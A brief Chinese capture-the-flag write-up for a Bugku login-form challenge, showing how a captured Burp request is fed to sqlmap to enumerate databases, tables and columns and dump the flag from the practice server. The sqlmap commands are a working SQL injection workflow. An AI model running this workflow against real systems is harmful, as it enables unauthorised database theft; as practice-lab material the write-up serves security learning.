bugku---这是一个神奇的登陆框 (burp配合sqlmap实例)
题目
http://123.206.87.240:9001/sql/
随便输入账号密码,然后打开burp进行拦截,并生成该页面的文件,保存到本地
然后使用sqlmap工具
构造相应语句
首先爆数据库
python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name --dbs
继续爆该数据库下的表
python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name -D bugkusql1 --tables
继续爆相应表的列名
python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name -D bugkusql1 -T flag1 --columns
最后爆出列名内容
python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -r"D:\test.txt" admin_name -D bugkusql1 -T flag1 -C flag1 --dump
最后得到flag!